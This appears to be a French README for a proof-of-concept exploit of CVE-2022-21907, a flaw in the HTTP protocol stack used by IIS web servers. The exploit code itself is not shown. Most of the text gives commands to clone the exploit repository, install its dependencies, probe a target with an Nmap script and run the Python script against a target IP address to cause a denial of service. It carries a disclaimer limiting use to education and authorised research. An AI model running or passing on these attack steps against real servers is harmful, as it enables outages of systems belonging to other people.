
Exploit de preuve de concept pour CVE-2022-21907, une vulnérabilité d'exécution de code à distance dans la pile de protocole HTTP (IIS). Comprend un script Python et un script Nmap pour la détection et l'exploitation.
⚠️ À des fins éducatives et de recherche de sécurité autorisées uniquement
Très reconnaissant envers l'auteur original du PoC NU11SECURITY et michelep
Vulnérabilité d'exécution de code à distance dans la pile de protocole HTTP. Cette vulnérabilité provoquerait une attaque par déni de service sur un système cible exécutant un serveur web IIS.
Installez git, puis clonez le PoC depuis le dépôt github :
sudo apt install git -y
git clone https://github.com/asepsaepdin/CVE-2022-21907.git
Installez les dépendances avec la commande pip3 :
sudo apt install python3-pip -y
cd CVE-2022-21907
pip3 install -r requirements.txt
Vérifiez la présence de la vulnérabilité sur la machine cible avec la commande :
nmap -p 80 --script dos_iis_2022_21907 10.10.10.1
Ensuite, exécutez le script PoC avec la commande :
python3 CVE-2022-21907.py -i 10.10.1.10
Remarques : spécifiez l'option -i avec l'adresse IP cible